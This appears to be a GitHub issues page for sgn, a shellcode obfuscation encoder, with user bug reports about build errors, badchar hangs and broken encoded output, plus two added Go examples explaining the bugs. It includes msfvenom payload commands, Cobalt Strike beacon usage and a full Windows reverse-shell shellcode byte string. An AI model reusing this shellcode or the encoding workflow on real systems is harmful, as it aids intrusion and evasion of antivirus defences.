egebalci / sgn
Shikata ga nai (仕方がない) encoder ported into go with several improvements
License: MIT License
I get the following error when installing by the suggested method on Debian 11
❯ go install github.com/EgeBalci/sgn@latest
# github.com/EgeBalci/sgn
/usr/local/go/pkg/tool/linux_amd64/link: running gcc failed: exit status 1
/usr/bin/ld: cannot find -lkeystone
/usr/bin/ld: cannot find -lkeystone
collect2: error: ld returned 1 exit status
When a payload like messagebox is encoded with sgn and badchars are not specified, it finishes in a second. If the badchars are specified like:
# sgn -badchars \\x00 -a 64 messagebox.bin
__ _ __ __ _
___ / / (_) /_____ _/ /____ _ ___ ____ _ ___ ___ _(_)
(_-</ _ \/ / '_/ _ `/ __/ _ `/ / _ `/ _ `/ / _ \/ _ `/ /
/___/_//_/_/_/\_\\_,_/\__/\_,_/ \_, /\_,_/ /_//_/\_,_/_/
========[Author:-Ege-Balcı-]====/___/=======v2.0.0=========
┻━┻ ︵ヽ(`Д´)ノ︵ ┻━┻ (ノ ゜Д゜)ノ ︵ 仕方がない
- Ciphering payload...
Then "Ciphering payload" uses the CPU at 100% and never finishes. NULL characters are quite frequently the source of payload delivery issues; maybe this should be looked into.
I assume it uses a brute-force approach to generate the payload and regenerates it if a NULL byte is still part of it? Is the algorithm capable of generating a NULL-byte-free payload?
The shellcodes generated by SGN 2.1 don't seem to work most of the time.
Windows 10, 64-bit executables. Using shellcode from mgeeky, shellcode loader runshc from https://github.com/hasherezade/masm_shc.
With SGN 2.1:
PS C:\Users\hacker\source\> C:\tools\sgn2.1\sgn.exe --arch=64 -i .\shellcodes\calc64.bin -o shellcodes\calc64.bin.sgn
(sgn banner omitted; it reports v2.0.1)
[*] Input: .\shellcodes\calc64.bin
[*] Input Size: 272
[*] Outfile: shellcodes\calc64.bin.sgn
[+] Final size: 409
[+] All done \(^O^)/
PS C:\Users\hacker\source> C:\Users\hacker\Source\Repos\masm_shc\out\build\x64-Debug\runshc\runshc.exe .\shellcodes\calc64.bin.sgn
[*] Reading module from: .\shellcodes\calc64.bin.sgn
[*] Running the shellcode:
-> No Calc appears
With SGN 2.0:
PS C:\Users\hacker\source> C:\tools\sgn2.0\sgn.exe -a 64 .\shellcodes\calc64.bin
(sgn banner omitted; it reports v2.0.0)
[*] Input: .\shellcodes\calc64.bin
[*] Input Size: 272
[*] Outfile: .\shellcodes\calc64.bin.sgn
[+] Final size: 352
[+] All done \(^O^)/
PS C:\Users\hacker\source> C:\Users\hacker\Source\Repos\masm_shc\out\build\x64-Debug\runshc\runshc.exe .\shellcodes\calc64.bin.sgn
[*] Reading module from: .\shellcodes\calc64.bin.sgn
[*] Running the shellcode:
-> Calc Opens
Attached is one working, one non-working shellcode (sgn.zip).
Hi,
the Go team suggests that we should use "go install github.com/example/example.git@latest" to download and compile the latest package, because "go get" will not support compiling in the future.
This is an awesome tool; it would be more awesome if there were a release package to download instead of having to compile it.
Hi,
SGN doesn't seem to work with the Cobalt Strike payload.
sgn.exe -a 64 -c 6 -plain-decoder beacon.bin
(sgn banner omitted; it reports v2.0.0)
[*] Input Size: 261120
[*] Outfile: beacon.bin.sgn
[+] Final size: 261311
[+] All done \(^O^)/
Once I try to load this https://github.com/slaeryan/AQUARMOURY/blob/master/Wraith/Testing/Loader.cpp the original beacon.bin works while beacon.bin.sgn doesn't. Please check and update. I am using the version available for download in the Releases folder
Hi,
I have created a shellcode via msfvenom using the command below; this shellcode is run via a loader and it works fine:
msfvenom -p windows/x64/exec CMD="calc.exe" -a x64 -o calc.bin
I then executed the command below, which produced calc.bin.sgn; when I load this via my loader and other loaders it does not work:
sgn -a 64 calc.bin
Am I doing something wrong here, or is there an issue?
Hello,
I am having some issues with the project since it's generating corrupted shellcode when using multiple iterations (e.g. 10).
The command that I am using to generate the (corrupted) shellcode has a random number of iterations and is the following:
sgn -a $BITS -c `expr $RANDOM % 10 + 1` -o /tmp/shellcode.bin $BLOB
When I set -c 1 it works; otherwise the shellcode crashes.
The shellcode that I have used for testing was generated with the following command:
msfvenom -p windows/x64/messagebox TEXT=hello TITLE=hello -f raw > messagebox.bin
The above part is the correct register selection, decryption uses three separate registers.
The following part is the wrong register selection. There is a conflict between the key register and the other two registers, resulting in an error in decryption. In this example, the key register is the 8-bit register of the data pointer register, causing the data pointer to be modified in the decryption loop.
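The conflict described in this comment, modelled as an added example (this is not sgn's own code): the decoder loop needs three registers (data pointer, counter, key), and x86-64 sub-registers alias their parent, so choosing the key register as the 8-bit form of the data pointer register (for instance DIL under RDI) makes every key operation silently rewrite the pointer. The register-family table, the `Selection` type and the function names are assumptions made for this example.

```go
package main

import (
	"errors"
	"fmt"
	"math/rand"
	"strings"
)

// Added example, not sgn's code. family maps any register name to its
// 64-bit parent, so two names that share a parent alias the same register.
var family = map[string]string{}

func init() {
	gp := [][]string{
		{"rax", "eax", "ax", "al", "ah"},
		{"rbx", "ebx", "bx", "bl", "bh"},
		{"rcx", "ecx", "cx", "cl", "ch"},
		{"rdx", "edx", "dx", "dl", "dh"},
		{"rsi", "esi", "si", "sil"},
		{"rdi", "edi", "di", "dil"},
		{"rbp", "ebp", "bp", "bpl"},
		{"rsp", "esp", "sp", "spl"},
	}
	for i := 8; i < 16; i++ { // r8..r15 and their d/w/b forms
		r := fmt.Sprintf("r%d", i)
		gp = append(gp, []string{r, r + "d", r + "w", r + "b"})
	}
	for _, fam := range gp {
		for _, name := range fam {
			family[name] = fam[0]
		}
	}
}

// Selection is the register triple a decoder loop would use (assumed layout).
type Selection struct {
	DataPtr string // points at the ciphered bytes
	Counter string // remaining iterations
	Key     string // XOR key, an 8-bit sub-register in this model
}

// ErrAlias is returned when two of the three registers share a parent.
var ErrAlias = errors.New("decoder registers alias each other")

// Validate rejects a selection in which any two registers share a family,
// and rejects the stack pointer family outright.
func Validate(s Selection) error {
	seen := map[string]string{} // parent -> name already chosen
	for _, r := range []string{s.DataPtr, s.Counter, s.Key} {
		r = strings.ToLower(r)
		parent, ok := family[r]
		if !ok {
			return fmt.Errorf("unknown register %q", r)
		}
		if parent == "rsp" {
			return fmt.Errorf("register %q: stack pointer is not usable", r)
		}
		if prev, dup := seen[parent]; dup {
			return fmt.Errorf("%w: %s and %s are both %s", ErrAlias, prev, r, parent)
		}
		seen[parent] = r
	}
	return nil
}

// PickRegisters draws random triples until Validate accepts one and reports
// how many draws that took. The candidate pools are assumptions.
func PickRegisters(rng *rand.Rand) (Selection, int) {
	ptrs := []string{"rax", "rbx", "rcx", "rdx", "rsi", "rdi", "r8", "r9", "r10", "r11"}
	keys := []string{"al", "bl", "cl", "dl", "sil", "dil", "r8b", "r9b", "r10b", "r11b"}
	for tries := 1; ; tries++ {
		s := Selection{
			DataPtr: ptrs[rng.Intn(len(ptrs))],
			Counter: ptrs[rng.Intn(len(ptrs))],
			Key:     keys[rng.Intn(len(keys))],
		}
		if Validate(s) == nil {
			return s, tries
		}
	}
}

func main() {
	bad := Selection{DataPtr: "rdi", Counter: "rcx", Key: "dil"} // the reported conflict
	fmt.Println("bad: ", Validate(bad))
	good := Selection{DataPtr: "rdi", Counter: "rcx", Key: "al"}
	fmt.Println("good:", Validate(good))
	s, n := PickRegisters(rand.New(rand.NewSource(1)))
	fmt.Printf("picked %+v after %d draw(s)\n", s, n)
}
```

Resolving every name to its 64-bit parent before comparing is the whole check; comparing the literal names (`rdi` versus `dil`) is exactly how a selector misses this class of conflict.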
Hi EgeBalci,
Trying to cross-compile and build from Linux and getting the error in the screenshot below:
FYI, keystone is built based on the steps listed here;
the linking path was changed to the /home/med... location where the keystone shared libs are located.
Any idea what might be causing this error?
Thanks.
Hi,
There is a bug in the way that badchars are identified:
Lines 101 to 105 in 9800932
the range operator returns an iterable index, not the value at the index, and the continue keyword breaks out of the inner range loop, not the outer loop. So when a badchar is identified (which will just be a number counting from 0 to however many badchars were in the parameter, not the actual badchar), the program drops out and into the 'write file, everything is good' part, even though it still has badchars.
When I fixed this, it took an extremely long time to brute force a single badchar (null) on a reasonably large shellcode blob. I suspect that removing/altering badchars may need to be a separate deliberate encoding step, rather than hoping that sgn just happens to not have the character in the output.
Any tips?
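An added example, not sgn's own code, serving both the hang reported for -badchars \\x00 earlier on this page and the range/continue defect described just above: it reconstructs the reported pattern as a buggy/fixed pair of check functions, then shows why "re-roll until no badchar appears" needs a retry budget. The function names, the toy single-byte XOR encoder and the sample payloads are all assumptions made for this example.

```go
package main

import (
	"bytes"
	"errors"
	"fmt"
	"math/rand"
)

// containsBadCharBuggy mirrors the reported pattern (reconstructed, not the
// project's lines). `for bc := range badchars` binds bc to the index
// (0, 1, 2, ...), not to the byte, and `continue` only skips one inner
// iteration, so the function always returns false and the caller proceeds
// to "write file, everything is good".
func containsBadCharBuggy(out, badchars []byte) bool {
	for _, b := range out {
		for bc := range badchars {
			if int(b) == bc {
				continue
			}
		}
	}
	return false
}

// containsBadCharFixed ranges over the values and stops on the first hit.
func containsBadCharFixed(out, badchars []byte) bool {
	for _, bc := range badchars {
		if bytes.IndexByte(out, bc) >= 0 {
			return true
		}
	}
	return false
}

// toyEncode stands in for the real encoder: the key byte followed by the
// payload XORed with it. The key is part of the output because a decoder
// stub has to embed it, so a zero key would itself reintroduce a null.
func toyEncode(payload []byte, key byte) []byte {
	out := make([]byte, 0, len(payload)+1)
	out = append(out, key)
	for _, b := range payload {
		out = append(out, b^key)
	}
	return out
}

// toyDecode inverts toyEncode.
func toyDecode(out []byte) []byte {
	key := out[0]
	p := make([]byte, len(out)-1)
	for i, b := range out[1:] {
		p[i] = b ^ key
	}
	return p
}

// ErrNoCleanOutput is returned when the retry budget is exhausted.
var ErrNoCleanOutput = errors.New("no badchar-free output within retry budget")

// EncodeAvoiding re-rolls the key until the output is free of badchars, but
// gives up after maxTries instead of spinning at 100% CPU. A payload that
// contains every byte value can never be made null-free by one XOR key (the
// byte equal to the key always becomes 0x00), so the bound is what turns a
// hang into an error the user can act on.
func EncodeAvoiding(payload, badchars []byte, maxTries int, rng *rand.Rand) ([]byte, int, error) {
	for tries := 1; tries <= maxTries; tries++ {
		out := toyEncode(payload, byte(rng.Intn(256)))
		if !containsBadCharFixed(out, badchars) {
			return out, tries, nil
		}
	}
	return nil, maxTries, ErrNoCleanOutput
}

func main() {
	payload := []byte{0x00, 0x48, 0x83, 0xe4, 0xf0, 0x00, 0x90} // constructed sample with nulls
	nulls := []byte{0x00}
	fmt.Println("buggy check sees null:", containsBadCharBuggy(payload, nulls))
	fmt.Println("fixed check sees null:", containsBadCharFixed(payload, nulls))

	rng := rand.New(rand.NewSource(1))
	out, tries, err := EncodeAvoiding(payload, nulls, 64, rng)
	if err == nil {
		fmt.Printf("clean output after %d tries, roundtrip ok=%v\n",
			tries, bytes.Equal(toyDecode(out), payload))
	}

	all := make([]byte, 256) // every byte value: unsolvable with one XOR key
	for i := range all {
		all[i] = byte(i)
	}
	_, tries, err = EncodeAvoiding(all, nulls, 64, rng)
	fmt.Printf("full-range payload: gave up after %d tries, err=%v\n", tries, err)
}
```

The second call in main is the interesting one: with an unbounded loop it is the 100% CPU, never-finishing behaviour from the earlier report, and no amount of re-rolling fixes it because the input itself rules out every key. Badchar avoidance therefore has to be a deliberate transformation of the encoder output, not a property one hopes a random key will happen to have.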
$ go install github.com/EgeBalci/sgn@latest
go: downloading github.com/EgeBalci/sgn v0.0.0-20221110152022-2dfae644524b
go: downloading github.com/briandowns/spinner v1.11.1
go: downloading github.com/fatih/color v1.10.0
go: downloading github.com/EgeBalci/keystone-go v0.0.0-20200525180613-e6c7cd32ceae
go: downloading github.com/olekukonko/tablewriter v0.0.4
go: downloading github.com/mattn/go-colorable v0.1.8
go: downloading github.com/mattn/go-isatty v0.0.12
go: downloading github.com/mattn/go-runewidth v0.0.7
go: downloading golang.org/x/sys v0.0.0-20200223170610-d5e6a3e2c0ae
# github.com/EgeBalci/sgn
/usr/bin/ld: cannot find -lkeystone: No such file or directory
/usr/bin/ld: cannot find -lkeystone: No such file or directory
/usr/bin/ld: cannot find -lkeystone: No such file or directory
/usr/bin/ld: cannot find -lkeystone: No such file or directory
collect2: error: ld returned 1 exit status
Hi there! My shellcode is windows/x64/shell_reverse_tcp with LHOST=127.0.0.1 and LPORT=6677, as below:
\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5\x49\xbc\x02\x00\x1a\x15\x7f\x00\x00\x01\x41\x54\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50\x48\x89\xe2\x57\x57\x57\x4d\x31\xc0\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44\x24\x54\x01\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5\x48\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5
and I call sgn with following command:
sgn -a 64 -safe -plain-decoder -c 1 payload.bin
I use shcode2exe to produce an executable, but it is not working!
When I use my normal msfvenom shellcode as posted above, the resulting exe works fine.
OS: Windows 10
SGN: binary
Cheers!
I replaced all cgo (github.com/EgeBalci/keystone-go) with github.com/AlexAltea/keystone.js. Then it is compiled to wasm.
repo: https://github.com/akkuman/sgn
demo project: https://github.com/akkuman/sgn-html
live demo: http://akkuman.github.io/sgn-html/